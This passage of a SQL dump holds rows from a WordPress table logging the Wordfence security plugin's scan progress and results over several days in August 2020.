(12984, 1596362316.364825, 2, 'info', 'Scanned contents of 454 additional files at 48.44 per second'),
(12985, 1596362317.377908, 2, 'info', 'Scanned contents of 498 additional files at 47.95 per second'),
(12986, 1596362318.398906, 2, 'info', 'Scanned contents of 525 additional files at 46.03 per second'),
(12987, 1596362319.406137, 2, 'info', 'Scanned contents of 591 additional files at 47.61 per second'),
(12988, 1596362320.411144, 2, 'info', 'Scanned contents of 626 additional files at 46.65 per second'),
(12989, 1596362321.442843, 2, 'info', 'Scanned contents of 678 additional files at 46.92 per second'),
(12990, 1596362322.782706, 2, 'info', 'Scanned contents of 706 additional files at 44.71 per second'),
(12991, 1596362323.788643, 2, 'info', 'Scanned contents of 751 additional files at 44.71 per second'),
(12992, 1596362324.803526, 2, 'info', 'Scanned contents of 799 additional files at 44.86 per second'),
(12993, 1596362325.814963, 2, 'info', 'Scanned contents of 834 additional files at 44.31 per second'),
(12994, 1596362326.845637, 2, 'info', 'Scanned contents of 882 additional files at 44.43 per second'),
(12995, 1596362327.846878, 2, 'info', 'Scanned contents of 928 additional files at 44.50 per second'),
(12996, 1596362328.856901, 2, 'info', 'Scanned contents of 968 additional files at 44.27 per second'),
(12997, 1596362329.865309, 2, 'info', 'Scanned contents of 1012 additional files at 44.24 per second'),
(12998, 1596362330.871012, 2, 'info', 'Scanned contents of 1071 additional files at 44.85 per second'),
(12999, 1596362331.872862, 2, 'info', 'Scanned contents of 1133 additional files at 45.54 per second'),
(13000, 1596362332.884238, 2, 'info', 'Scanned contents of 1187 additional files at 45.84 per second'),
(13001, 1596362333.892525, 2, 'info', 'Scanned contents of 1240 additional files at 46.10 per second'),
(13002, 1596362334.969835, 2, 'info', 'Scanned contents of 1287 additional files at 46.00 per second'),
(13003, 1596362335.979101, 2, 'info', 'Scanned contents of 1341 additional files at 46.26 per second'),
(13004, 1596362336.983084, 2, 'info', 'Scanned contents of 1387 additional files at 46.25 per second'),
(13005, 1596362337.992163, 2, 'info', 'Scanned contents of 1428 additional files at 46.06 per second'),
(13006, 1596362339.112686, 2, 'info', 'Scanned contents of 1429 additional files at 44.49 per second'),
(13007, 1596362340.132908, 2, 'info', 'Scanned contents of 1462 additional files at 44.11 per second'),
(13008, 1596362341.135967, 2, 'info', 'Scanned contents of 1505 additional files at 44.08 per second'),
(13009, 1596362342.139775, 2, 'info', 'Scanned contents of 1540 additional files at 43.82 per second'),
(13010, 1596362343.150197, 2, 'info', 'Scanned contents of 1579 additional files at 43.67 per second'),
(13011, 1596362344.155536, 2, 'info', 'Scanned contents of 1634 additional files at 43.97 per second'),
(13012, 1596362345.155760, 2, 'info', 'Scanned contents of 1690 additional files at 44.28 per second'),
(13013, 1596362346.161369, 2, 'info', 'Scanned contents of 1722 additional files at 43.96 per second'),
(13014, 1596362347.163000, 2, 'info', 'Scanned contents of 1771 additional files at 44.09 per second'),
(13015, 1596362348.316521, 2, 'info', 'Scanned contents of 1826 additional files at 44.19 per second'),
(13016, 1596362349.337711, 2, 'info', 'Scanned contents of 1872 additional files at 44.21 per second'),
(13017, 1596362350.350040, 2, 'info', 'Scanned contents of 1927 additional files at 44.44 per second'),
(13018, 1596362351.401895, 2, 'info', 'Scanned contents of 1971 additional files at 44.38 per second'),
(13019, 1596362352.414392, 2, 'info', 'Scanned contents of 1999 additional files at 44.01 per second'),
(13020, 1596362353.421695, 2, 'info', 'Scanned contents of 2060 additional files at 44.37 per second'),
(13021, 1596362354.977673, 2, 'info', 'Scanned contents of 2089 additional files at 43.53 per second'),
(13022, 1596362355.980280, 2, 'info', 'Scanned contents of 2134 additional files at 43.56 per second'),
(13023, 1596362356.993012, 2, 'info', 'Scanned contents of 2185 additional files at 43.70 per second'),
(13024, 1596362358.007066, 2, 'info', 'Scanned contents of 2229 additional files at 43.69 per second'),
(13025, 1596362359.902428, 2, 'info', 'Scanned contents of 2267 additional files at 42.85 per second'),
(13026, 1596362360.913345, 2, 'info', 'Scanned contents of 2328 additional files at 43.17 per second'),
(13027, 1596362361.936367, 2, 'info', 'Scanned contents of 2370 additional files at 43.13 per second'),
(13028, 1596362362.941878, 2, 'info', 'Scanned contents of 2411 additional files at 43.09 per second'),
(13029, 1596362363.944184, 2, 'info', 'Scanned contents of 2446 additional files at 42.95 per second'),
(13030, 1596362364.956052, 2, 'info', 'Scanned contents of 2479 additional files at 42.77 per second'),
(13031, 1596362366.112702, 2, 'info', 'Scanned contents of 2525 additional files at 42.71 per second'),
(13032, 1596362367.117086, 2, 'info', 'Scanned contents of 2581 additional files at 42.93 per second'),
(13033, 1596362368.130877, 2, 'info', 'Scanned contents of 2642 additional files at 43.21 per second'),
(13034, 1596362369.130914, 2, 'info', 'Scanned contents of 2687 additional files at 43.24 per second'),
(13035, 1596362370.870623, 2, 'info', 'Scanned contents of 2730 additional files at 42.74 per second'),
(13036, 1596362371.571531, 2, 'info', 'Scanned contents of 2760 additional files at 42.74 per second'),
(13037, 1596362371.572501, 2, 'info', 'Asking Wordfence to check URLs against malware list.'),
(13038, 1596362371.585841, 2, 'info', 'Checking 1373 host keys against Wordfence scanning servers.'),
(13039, 1596362372.670323, 2, 'info', 'Done host key check.'),
(13040, 1596362372.683224, 2, 'info', 'Checking 3 URLs from 3 sources.'),
(13041, 1596362373.423755, 2, 'info', 'Done URL check.'),
(13042, 1596362373.443150, 2, 'info', 'Done file contents scan'),
(13048, 1596362373.598540, 2, 'info', 'Examining URLs found in posts we scanned for dangerous websites'),
(13049, 1596362373.600287, 2, 'info', 'Checking 4 host keys against Wordfence scanning servers.'),
(13050, 1596362374.338420, 2, 'info', 'Done host key check.'),
(13051, 1596362374.348482, 2, 'info', 'Done examining URLs'),
(13056, 1596362374.465654, 2, 'info', 'Starting password strength check on 1 users.'),
(13063, 1596362381.244057, 2, 'info', 'Examining URLs found in the options we scanned for dangerous websites'),
(13064, 1596362381.245476, 2, 'info', 'Done examining URLs'),
(13066, 1596362381.256339, 1, 'info', '-------------------'),
(13067, 1596362381.257100, 2, 'info', 'Wordfence used 12 MB of memory for scan. Server peak memory usage was: 26 MB'),
(13068, 1596362381.257867, 1, 'info', 'Scan Complete. Scanned 5127 files, 6 plugins, 2 themes, 20 posts, 0 comments and 2862 URLs in 2 minutes 21 seconds.'),
(13071, 1596376055.979401, 1, 'info', 'Initiating quick scan'),
(13076, 1596376056.087440, 1, 'info', '-------------------'),
(13077, 1596376056.090169, 2, 'info', 'Wordfence used 0 B of memory for scan. Server peak memory usage was: 10 MB'),
(13078, 1596376056.093454, 1, 'info', 'Quick Scan Complete. Scanned in 1 second.'),
(13081, 1596462573.656085, 1, 'info', 'Initiating quick scan'),
(13086, 1596462573.848550, 1, 'info', '-------------------'),
(13087, 1596462573.850572, 2, 'info', 'Wordfence used 0 B of memory for scan. Server peak memory usage was: 10 MB'),
(13088, 1596462573.869177, 1, 'info', 'Quick Scan Complete. Scanned in less than 1 second.'),
(13091, 1596548446.570758, 1, 'info', 'Initiating quick scan'),
(13096, 1596548446.720064, 1, 'info', '-------------------'),
(13097, 1596548446.722641, 2, 'info', 'Wordfence used 0 B of memory for scan. Server peak memory usage was: 10 MB'),
(13098, 1596548446.728283, 1, 'info', 'Quick Scan Complete. Scanned in less than 1 second.'),
(13100, 1596621917.380738, 1, 'info', 'Scheduled Wordfence scan starting at Wednesday 5th of August 2020 01:05:17 PM'),
(13102, 1596621921.581117, 1, 'info', 'Contacting Wordfence to initiate scan'),
(13109, 1596621929.544871, 2, 'info', 'Unable to access available disk space information'),
(13117, 1596621929.763875, 2, 'info', 'Getting plugin list from WordPress'),
(13118, 1596621929.767385, 2, 'info', 'Found 6 plugins'),
(13119, 1596621929.768207, 2, 'info', 'Getting theme list from WordPress'),
(13120, 1596621929.768976, 2, 'info', 'Found 2 themes'),
(13123, 1596621931.639787, 10, 'info', 'SUM_START:Fetching list of known malware files from Wordfence'),
(13124, 1596621931.687260, 10, 'info', 'SUM_ENDSUCCESS:Fetching list of known malware files from Wordfence'),
(13125, 1596621931.701333, 10, 'info', 'SUM_START:Fetching list of known core files from Wordfence'),
(13126, 1596621931.737094, 10, 'info', 'SUM_ENDSUCCESS:Fetching list of known core files from Wordfence'),
(13127, 1596621931.750525, 10, 'info', 'SUM_START:Comparing core WordPress files against originals in repository'),
(13128, 1596621931.757280, 10, 'info', 'SUM_DISABLED:Skipping theme scan'),
(13129, 1596621931.758566, 10, 'info', 'SUM_DISABLED:Skipping plugin scan'),
(13130, 1596621931.769486, 10, 'info', 'SUM_START:Scanning for known malware files'),
(13131, 1596621931.806096, 10, 'info', 'SUM_START:Scanning for unknown files in wp-admin and wp-includes'),
(13132, 1596621932.384075, 2, 'info', '500 files indexed'),
(13133, 1596621933.940094, 2, 'info', '1000 files indexed'),
(13134, 1596621934.185735, 2, 'info', '1500 files indexed'),
(13135, 1596621934.779866, 2, 'info', '2000 files indexed'),
(13136, 1596621935.050210, 2, 'info', '2500 files indexed'),
(13137, 1596621935.379930, 2, 'info', '3000 files indexed'),
(13138, 1596621936.082923, 2, 'info', '3500 files indexed'),
(13139, 1596621936.475034, 2, 'info', '4000 files indexed'),
(13140, 1596621939.010755, 2, 'info', '4244 files indexed'),
(13141, 1596621940.595491, 2, 'info', '4744 files indexed'),
(13142, 1596621940.853915, 2, 'info', '5131 files indexed'),
(13143, 1596621942.177367, 2, 'info', 'Analyzed 100 files containing 1.45 MB of data so far'),
(13144, 1596621943.551484, 2, 'info', 'Analyzed 200 files containing 2.49 MB of data so far'),
(13145, 1596621944.824800, 2, 'info', 'Analyzed 300 files containing 3.82 MB of data so far'),
(13146, 1596621946.328651, 2, 'info', 'Analyzed 400 files containing 6.27 MB of data so far'),
(13147, 1596621947.757783, 2, 'info', 'Analyzed 500 files containing 7.07 MB of data so far'),
(13148, 1596621948.925279, 2, 'info', 'Analyzed 600 files containing 8.24 MB of data so far'),
(13149, 1596621949.906093, 2, 'info', 'Analyzed 700 files containing 10.12 MB of data so far'),
(13150, 1596621950.623532, 2, 'info', 'Analyzed 800 files containing 12.17 MB of data so far'),
(13151, 1596621951.411160, 2, 'info', 'Analyzed 900 files containing 14.74 MB of data so far'),
(13152, 1596621952.653919, 2, 'info', 'Analyzed 1000 files containing 17.6 MB of data so far'),
(13153, 1596621953.867743, 2, 'info', 'Analyzed 1100 files containing 17.93 MB of data so far'),
(13154, 1596621954.633230, 2, 'info', 'Analyzed 1200 files containing 18.48 MB of data so far'),
(13155, 1596621955.420463, 2, 'info', 'Analyzed 1300 files containing 18.79 MB of data so far'),
(13156, 1596621957.518716, 2, 'info', 'Analyzed 1400 files containing 19.75 MB of data so far'),
(13157, 1596621958.887015, 2, 'info', 'Analyzed 1500 files containing 19.98 MB of data so far'),
(13158, 1596621960.136153, 2, 'info', 'Analyzed 1600 files containing 20.94 MB of data so far'),
(13159, 1596621961.206014, 2, 'info', 'Analyzed 1700 files containing 23.65 MB of data so far'),
(13160, 1596621961.504687, 2, 'info', 'Analyzed 1800 files containing 23.68 MB of data so far'),
(13161, 1596621962.305119, 2, 'info', 'Analyzed 1900 files containing 23.71 MB of data so far'),
(13162, 1596621963.318473, 2, 'info', 'Analyzed 2000 files containing 24.06 MB of data so far'),
(13163, 1596621963.786007, 2, 'info', 'Analyzed 2100 files containing 24.81 MB of data so far'),
(13164, 1596621964.105479, 2, 'info', 'Analyzed 2200 files containing 25.53 MB of data so far'),
(13165, 1596621964.342756, 2, 'info', 'Analyzed 2300 files containing 26.19 MB of data so far'),
(13166, 1596621964.810105, 2, 'info', 'Analyzed 2400 files containing 26.22 MB of data so far'),
(13167, 1596621965.065266, 2, 'info', 'Analyzed 2500 files containing 26.25 MB of data so far');
INSERT INTO `zdenl_wfstatus` (`id`, `ctime`, `level`, `type`, `msg`) VALUES
(13168, 1596621965.293339, 2, 'info', 'Analyzed 2600 files containing 26.27 MB of data so far'),
(13169, 1596621965.632045, 2, 'info', 'Analyzed 2700 files containing 26.3 MB of data so far'),
(13170, 1596621965.947097, 2, 'info', 'Analyzed 2800 files containing 26.34 MB of data so far'),
(13171, 1596621966.887662, 2, 'info', 'Analyzed 2900 files containing 26.36 MB of data so far'),
(13172, 1596621967.598200, 2, 'info', 'Analyzed 3000 files containing 27.58 MB of data so far'),
(13173, 1596621968.918747, 2, 'info', 'Analyzed 3100 files containing 28.53 MB of data so far'),
(13174, 1596621970.217831, 2, 'info', 'Analyzed 3200 files containing 30.08 MB of data so far'),
(13175, 1596621971.553091, 2, 'info', 'Analyzed 3300 files containing 35.69 MB of data so far'),
(13176, 1596621973.764814, 2, 'info', 'Analyzed 3400 files containing 37.43 MB of data so far'),
(13177, 1596621974.569869, 2, 'info', 'Analyzed 3500 files containing 38.21 MB of data so far'),
(13178, 1596621975.485567, 2, 'info', 'Analyzed 3600 files containing 39.28 MB of data so far'),
(13179, 1596621976.629471, 2, 'info', 'Analyzed 3700 files containing 41.91 MB of data so far'),
(13180, 1596621977.497506, 2, 'info', 'Analyzed 3800 files containing 43.65 MB of data so far'),
(13181, 1596621978.312702, 2, 'info', 'Analyzed 3900 files containing 44.04 MB of data so far'),
(13182, 1596621979.629325, 2, 'info', 'Analyzed 4000 files containing 45.4 MB of data so far'),
(13183, 1596621980.762008, 2, 'info', 'Analyzed 4100 files containing 48.86 MB of data so far'),
(13184, 1596621981.758270, 2, 'info', 'Analyzed 4200 files containing 50.37 MB of data so far'),
(13185, 1596621983.241772, 2, 'info', 'Analyzed 4300 files containing 52.4 MB of data so far'),
(13186, 1596621985.034546, 2, 'info', 'Analyzed 4400 files containing 54.61 MB of data so far'),
(13187, 1596621986.428291, 2, 'info', 'Analyzed 4500 files containing 55.86 MB of data so far'),
(13188, 1596621988.601059, 2, 'info', 'Analyzed 4600 files containing 64.74 MB of data so far'),
(13189, 1596621990.843138, 2, 'info', 'Analyzed 4700 files containing 68.14 MB of data so far'),
(13190, 1596621992.313874, 2, 'info', 'Analyzed 4800 files containing 70.6 MB of data so far'),
(13191, 1596621993.736450, 2, 'info', 'Analyzed 4900 files containing 73.18 MB of data so far'),
(13192, 1596621995.042345, 2, 'info', 'Analyzed 5000 files containing 76.17 MB of data so far'),
(13193, 1596621996.482401, 2, 'info', 'Analyzed 5100 files containing 77.69 MB of data so far'),
(13194, 1596621996.845276, 2, 'info', 'Analyzed 5131 files containing 78.1 MB of data.'),
(13195, 1596621996.846409, 10, 'info', 'SUM_ENDOK:Comparing core WordPress files against originals in repository'),
(13196, 1596621996.854680, 10, 'info', 'SUM_ENDOK:Scanning for unknown files in wp-admin and wp-includes'),
(13197, 1596621996.862652, 10, 'info', 'SUM_ENDOK:Scanning for known malware files'),
(13198, 1596621996.894614, 10, 'info', 'SUM_START:Check for publicly accessible configuration files, backup files and logs'),
(13199, 1596621997.008408, 10, 'info', 'SUM_ENDOK:Check for publicly accessible configuration files, backup files and logs'),
(13200, 1596621997.044749, 10, 'info', 'SUM_START:Scanning file contents for infections and vulnerabilities'),
(13201, 1596621997.055824, 10, 'info', 'SUM_START:Scanning file contents for URLs on a domain blacklist'),
(13202, 1596621999.663123, 2, 'info', 'Starting scan of file contents'),
(13203, 1596622000.846927, 2, 'info', 'Scanned contents of 33 additional files at 28.48 per second'),
(13204, 1596622001.854966, 2, 'info', 'Scanned contents of 90 additional files at 41.53 per second'),
(13205, 1596622002.875361, 2, 'info', 'Scanned contents of 122 additional files at 38.28 per second'),
(13206, 1596622003.885497, 2, 'info', 'Scanned contents of 159 additional files at 37.88 per second'),
(13207, 1596622004.981000, 2, 'info', 'Scanned contents of 183 additional files at 34.57 per second'),
(13208, 1596622006.084142, 2, 'info', 'Scanned contents of 186 additional files at 29.08 per second'),
(13209, 1596622007.132794, 2, 'info', 'Scanned contents of 234 additional files at 31.43 per second'),
(13210, 1596622008.148573, 2, 'info', 'Scanned contents of 294 additional files at 34.75 per second'),
(13211, 1596622009.157167, 2, 'info', 'Scanned contents of 328 additional files at 34.64 per second'),
(13212, 1596622010.165106, 2, 'info', 'Scanned contents of 363 additional files at 34.65 per second'),
(13213, 1596622011.185813, 2, 'info', 'Scanned contents of 402 additional files at 34.96 per second'),
(13214, 1596622012.196927, 2, 'info', 'Scanned contents of 458 additional files at 36.61 per second'),
(13215, 1596622013.249830, 2, 'info', 'Scanned contents of 492 additional files at 36.28 per second'),
(13216, 1596622014.713539, 2, 'info', 'Scanned contents of 511 additional files at 34.01 per second'),
(13217, 1596622015.730842, 2, 'info', 'Scanned contents of 549 additional files at 34.22 per second'),
(13218, 1596622016.748695, 2, 'info', 'Scanned contents of 598 additional files at 35.05 per second'),
(13219, 1596622017.820300, 2, 'info', 'Scanned contents of 620 additional files at 34.19 per second'),
(13220, 1596622018.840159, 2, 'info', 'Scanned contents of 669 additional files at 34.93 per second'),
(13221, 1596622019.852801, 2, 'info', 'Scanned contents of 722 additional files at 35.81 per second'),
(13222, 1596622020.867965, 2, 'info', 'Scanned contents of 766 additional files at 36.17 per second'),
(13223, 1596622022.211408, 2, 'info', 'Scanned contents of 772 additional files at 34.28 per second'),
(13224, 1596622023.216929, 2, 'info', 'Scanned contents of 795 additional files at 33.79 per second'),
(13225, 1596622024.237255, 2, 'info', 'Scanned contents of 824 additional files at 33.57 per second'),
(13226, 1596622025.239146, 2, 'info', 'Scanned contents of 848 additional files at 33.19 per second'),
(13227, 1596622026.243853, 2, 'info', 'Scanned contents of 885 additional files at 33.33 per second'),
(13228, 1596622027.248481, 2, 'info', 'Scanned contents of 926 additional files at 33.60 per second'),
(13229, 1596622028.300055, 2, 'info', 'Scanned contents of 968 additional files at 33.83 per second'),
(13230, 1596622029.307860, 2, 'info', 'Scanned contents of 1010 additional files at 34.10 per second'),
(13231, 1596622030.312263, 2, 'info', 'Scanned contents of 1066 additional files at 34.81 per second'),
(13232, 1596622031.327196, 2, 'info', 'Scanned contents of 1125 additional files at 35.56 per second'),
(13233, 1596622032.352985, 2, 'info', 'Scanned contents of 1157 additional files at 35.42 per second'),
(13234, 1596622033.465548, 2, 'info', 'Scanned contents of 1188 additional files at 35.17 per second'),
(13235, 1596622034.478161, 2, 'info', 'Scanned contents of 1225 additional files at 35.21 per second'),
(13236, 1596622035.528284, 2, 'info', 'Scanned contents of 1290 additional files at 35.99 per second'),
(13237, 1596622036.541651, 2, 'info', 'Scanned contents of 1343 additional files at 36.44 per second'),
(13238, 1596622037.548100, 2, 'info', 'Scanned contents of 1395 additional files at 36.85 per second'),
(13239, 1596622039.332488, 2, 'info', 'Scanned contents of 1416 additional files at 35.72 per second'),
(13240, 1596622040.333083, 2, 'info', 'Scanned contents of 1439 additional files at 35.40 per second'),
(13241, 1596622041.349850, 2, 'info', 'Scanned contents of 1460 additional files at 35.04 per second'),
(13242, 1596622042.356769, 2, 'info', 'Scanned contents of 1487 additional files at 34.85 per second'),
(13243, 1596622043.400148, 2, 'info', 'Scanned contents of 1521 additional files at 34.80 per second'),
(13244, 1596622044.421684, 2, 'info', 'Scanned contents of 1542 additional files at 34.47 per second'),
(13245, 1596622045.570817, 2, 'info', 'Scanned contents of 1564 additional files at 34.09 per second'),
(13246, 1596622046.592757, 2, 'info', 'Scanned contents of 1607 additional files at 34.26 per second'),
(13247, 1596622047.607100, 2, 'info', 'Scanned contents of 1636 additional files at 34.14 per second'),
(13248, 1596622048.618161, 2, 'info', 'Scanned contents of 1668 additional files at 34.09 per second'),
(13249, 1596622049.722006, 2, 'info', 'Scanned contents of 1695 additional files at 33.88 per second'),
(13250, 1596622050.784990, 2, 'info', 'Scanned contents of 1719 additional files at 33.64 per second'),
(13251, 1596622051.815550, 2, 'info', 'Scanned contents of 1752 additional files at 33.61 per second'),
(13252, 1596622052.816043, 2, 'info', 'Scanned contents of 1807 additional files at 34.01 per second'),
(13253, 1596622053.858666, 2, 'info', 'Scanned contents of 1853 additional files at 34.21 per second'),
(13254, 1596622054.880262, 2, 'info', 'Scanned contents of 1887 additional files at 34.19 per second'),
(13255, 1596622056.352414, 2, 'info', 'Scanned contents of 1891 additional files at 33.37 per second'),
(13256, 1596622057.371062, 2, 'info', 'Scanned contents of 1918 additional files at 33.25 per second'),
(13257, 1596622058.383304, 2, 'info', 'Scanned contents of 1960 additional files at 33.39 per second'),
(13258, 1596622059.693761, 2, 'info', 'Scanned contents of 1998 additional files at 33.30 per second'),
(13259, 1596622060.713862, 2, 'info', 'Scanned contents of 2033 additional files at 33.31 per second'),
(13260, 1596622061.783185, 2, 'info', 'Scanned contents of 2070 additional files at 33.34 per second'),
(13261, 1596622062.867309, 2, 'info', 'Scanned contents of 2105 additional files at 33.32 per second'),
(13262, 1596622063.911559, 2, 'info', 'Scanned contents of 2146 additional files at 33.41 per second'),
(13263, 1596622064.929416, 2, 'info', 'Scanned contents of 2199 additional files at 33.71 per second'),
(13264, 1596622066.060211, 2, 'info', 'Scanned contents of 2235 additional files at 33.67 per second'),
(13265, 1596622067.705847, 2, 'info', 'Scanned contents of 2271 additional files at 33.39 per second'),
(13266, 1596622068.761868, 2, 'info', 'Scanned contents of 2318 additional files at 33.56 per second'),
(13267, 1596622069.774907, 2, 'info', 'Scanned contents of 2350 additional files at 33.53 per second'),
(13268, 1596622070.783659, 2, 'info', 'Scanned contents of 2385 additional files at 33.55 per second'),
(13269, 1596622071.799275, 2, 'info', 'Scanned contents of 2421 additional files at 33.57 per second'),
(13270, 1596622073.382746, 2, 'info', 'Scanned contents of 2424 additional files at 32.89 per second'),
(13271, 1596622074.383911, 2, 'info', 'Scanned contents of 2454 additional files at 32.85 per second'),
(13272, 1596622075.416193, 2, 'info', 'Scanned contents of 2493 additional files at 32.92 per second'),
(13273, 1596622076.598015, 2, 'info', 'Scanned contents of 2529 additional files at 32.88 per second'),
(13274, 1596622077.635212, 2, 'info', 'Scanned contents of 2565 additional files at 32.91 per second'),
(13275, 1596622078.645773, 2, 'info', 'Scanned contents of 2603 additional files at 32.97 per second'),
(13276, 1596622079.663392, 2, 'info', 'Scanned contents of 2639 additional files at 33.00 per second'),
(13277, 1596622080.681014, 2, 'info', 'Scanned contents of 2668 additional files at 32.94 per second'),
(13278, 1596622081.698434, 2, 'info', 'Scanned contents of 2708 additional files at 33.02 per second'),
(13279, 1596622082.704845, 2, 'info', 'Scanned contents of 2757 additional files at 33.21 per second'),
(13280, 1596622082.878487, 2, 'info', 'Scanned contents of 2764 additional files at 33.22 per second'),
(13281, 1596622082.880117, 2, 'info', 'Asking Wordfence to check URLs against malware list.'),
(13282, 1596622082.902047, 2, 'info', 'Checking 1391 host keys against Wordfence scanning servers.'),
(13283, 1596622084.094428, 2, 'info', 'Done host key check.'),
(13284, 1596622084.099192, 2, 'info', 'Checking 3 URLs from 3 sources.'),
(13285, 1596622084.911645, 2, 'info', 'Done URL check.'),
(13286, 1596622084.936639, 2, 'info', 'Done file contents scan'),
(13287, 1596622084.943798, 10, 'info', 'SUM_ENDOK:Scanning file contents for infections and vulnerabilities'),
(13288, 1596622084.958081, 10, 'info', 'SUM_ENDOK:Scanning file contents for URLs on a domain blacklist'),
(13289, 1596622084.979085, 10, 'info', 'SUM_START:Scanning for publicly accessible quarantined files'),
(13290, 1596622084.988666, 10, 'info', 'SUM_ENDOK:Scanning for publicly accessible quarantined files'),
(13291, 1596622085.008341, 10, 'info', 'SUM_START:Scanning posts for URLs on a domain blacklist'),
(13292, 1596622085.123144, 2, 'info', 'Examining URLs found in posts we scanned for dangerous websites'),
(13293, 1596622085.125285, 2, 'info', 'Checking 4 host keys against Wordfence scanning servers.'),
(13294, 1596622085.883043, 2, 'info', 'Done host key check.'),
(13295, 1596622085.889181, 2, 'info', 'Done examining URLs'),
(13296, 1596622085.899036, 10, 'info', 'SUM_ENDOK:Scanning posts for URLs on a domain blacklist'),
(13297, 1596622085.919950, 10, 'info', 'SUM_START:Scanning comments for URLs on a domain blacklist'),
(13298, 1596622086.024727, 10, 'info', 'SUM_ENDOK:Scanning comments for URLs on a domain blacklist'),
(13299, 1596622086.050506, 10, 'info', 'SUM_START:Scanning for weak passwords'),
(13300, 1596622086.058101, 2, 'info', 'Starting password strength check on 1 users.'),
(13301, 1596622086.085632, 10, 'info', 'SUM_ENDOK:Scanning for weak passwords'),
(13302, 1596622086.106668, 10, 'info', 'SUM_START:Scanning for old themes, plugins and core files'),
(13303, 1596622094.100379, 10, 'info', 'SUM_ENDBAD:Scanning for old themes, plugins and core files'),
(13304, 1596622094.124238, 10, 'info', 'SUM_START:Scanning for admin users not created through WordPress'),
(13305, 1596622094.252101, 10, 'info', 'SUM_ENDOK:Scanning for admin users not created through WordPress'),
(13306, 1596622094.271795, 10, 'info', 'SUM_START:Scanning for suspicious site options'),
(13307, 1596622094.367011, 2, 'info', 'Examining URLs found in the options we scanned for dangerous websites'),
(13308, 1596622094.369785, 2, 'info', 'Done examining URLs'),
(13309, 1596622094.380149, 10, 'info', 'SUM_ENDOK:Scanning for suspicious site options'),
(13310, 1596622094.394140, 1, 'info', '-------------------'),
(13311, 1596622094.396263, 2, 'info', 'Wordfence used 12 MB of memory for scan. Server peak memory usage was: 26 MB'),
(13312, 1596622094.397685, 1, 'info', 'Scan Complete. Scanned 5131 files, 6 plugins, 2 themes, 20 posts, 0 comments and 2910 URLs in 2 minutes 51 seconds.'),
(13313, 1596622094.398864, 10, 'info', 'SUM_FINAL:Scan complete. You have 2 new issues to fix. See below.'),
(13314, 1596634921.195864, 10, 'info', 'SUM_PREP:Preparing a new scan.'),
(13315, 1596634921.199948, 1, 'info', 'Initiating quick scan'),
(13316, 1596634921.219752, 10, 'info', 'SUM_START:Checking Web Application Firewall status'),
(13317, 1596634921.220800, 10, 'info', 'SUM_ENDOK:Checking Web Application Firewall status'),
(13318, 1596634921.227058, 10, 'info', 'SUM_START:Scanning for old themes, plugins and core files'),
(13319, 1596634921.255122, 10, 'info', 'SUM_ENDBAD:Scanning for old themes, plugins and core files'),
(13320, 1596634921.258827, 1, 'info', '-------------------'),
(13321, 1596634921.261269, 2, 'info', 'Wordfence used 0 B of memory for scan. Server peak memory usage was: 8 MB'),
(13322, 1596634921.264861, 1, 'info', 'Quick Scan Complete. Scanned in less than 1 second.'),
(13323, 1596634921.265495, 10, 'info', 'SUM_FINAL:Scan complete. You have 2 new issues to fix. See below.'),
(13324, 1596721248.430743, 10, 'info', 'SUM_PREP:Preparing a new scan.'),
(13325, 1596721248.434058, 1, 'info', 'Initiating quick scan'),
(13326, 1596721248.443133, 10, 'info', 'SUM_START:Checking Web Application Firewall status'),
(13327, 1596721248.443865, 10, 'info', 'SUM_ENDOK:Checking Web Application Firewall status'),
(13328, 1596721248.451363, 10, 'info', 'SUM_START:Scanning for old themes, plugins and core files'),
(13329, 1596721248.475963, 10, 'info', 'SUM_ENDBAD:Scanning for old themes, plugins and core files'),
(13330, 1596721248.480429, 1, 'info', '-------------------'),
(13331, 1596721248.481784, 2, 'info', 'Wordfence used 0 B of memory for scan. Server peak memory usage was: 40 MB'),
(13332, 1596721248.482340, 1, 'info', 'Quick Scan Complete. Scanned in less than 1 second.'),
(13333, 1596721248.483106, 10, 'info', 'SUM_FINAL:Scan complete. You have 2 new issues to fix. See below.'),
(13334, 1596808105.946544, 10, 'info', 'SUM_PREP:Preparing a new scan.'),
(13335, 1596808105.949519, 1, 'info', 'Initiating quick scan'),
(13336, 1596808105.964635, 10, 'info', 'SUM_START:Checking Web Application Firewall status'),
(13337, 1596808105.965885, 10, 'info', 'SUM_ENDOK:Checking Web Application Firewall status'),
(13338, 1596808105.974132, 10, 'info', 'SUM_START:Scanning for old themes, plugins and core files'),
(13339, 1596808105.993751, 10, 'info', 'SUM_ENDBAD:Scanning for old themes, plugins and core files'),
(13340, 1596808105.997607, 1, 'info', '-------------------'),
(13341, 1596808105.999135, 2, 'info', 'Wordfence used 0 B of memory for scan. Server peak memory usage was: 22 MB'),
(13342, 1596808105.999565, 1, 'info', 'Quick Scan Complete. Scanned in less than 1 second.'),
(13343, 1596808106.000108, 10, 'info', 'SUM_FINAL:Scan complete. You have 2 new issues to fix. See below.'),
(13344, 1596880898.797293, 1, 'info', 'Scheduled Wordfence scan starting at Saturday 8th of August 2020 01:01:38 PM'),
(13345, 1596880902.357693, 10, 'info', 'SUM_PREP:Preparing a new scan.'),
(13346, 1596880902.366189, 1, 'info', 'Contacting Wordfence to initiate scan'),
(13347, 1596880904.129818, 10, 'info', 'SUM_PAIDONLY:Check if your site is being Spamvertized is for paid members only'),
(13348, 1596880906.137818, 10, 'info', 'SUM_PAIDONLY:Checking if your IP is generating spam is for paid members only'),
(13349, 1596880908.176213, 10, 'info', 'SUM_PAIDONLY:Checking if your site is on a domain blacklist is for paid members only'),
(13350, 1596880910.189626, 10, 'info', 'SUM_START:Checking for the most secure way to get IPs'),
(13351, 1596880912.726061, 10, 'info', 'SUM_ENDOK:Checking for the most secure way to get IPs'),
(13352, 1596880912.735207, 10, 'info', 'SUM_START:Scanning to check available disk space'),
(13353, 1596880912.738372, 2, 'info', 'Unable to access available disk space information'),
(13354, 1596880912.738779, 10, 'info', 'SUM_ENDOK:Scanning to check available disk space'),
(13355, 1596880912.746648, 10, 'info', 'SUM_START:Checking Web Application Firewall status'),
(13356, 1596880912.750050, 10, 'info', 'SUM_ENDOK:Checking Web Application Firewall status'),
(13357, 1596880912.757974, 10, 'info', 'SUM_START:Checking for future GeoIP support'),
(13358, 1596880912.760963, 10, 'info', 'SUM_ENDOK:Checking for future GeoIP support'),
(13359, 1596880912.769065, 10, 'info', 'SUM_START:Checking for paths skipped due to scan settings'),
(13360, 1596880912.782064, 10, 'info', 'SUM_ENDOK:Checking for paths skipped due to scan settings'),
(13361, 1596880912.788703, 2, 'info', 'Getting plugin list from WordPress'),
(13362, 1596880912.791255, 2, 'info', 'Found 6 plugins'),
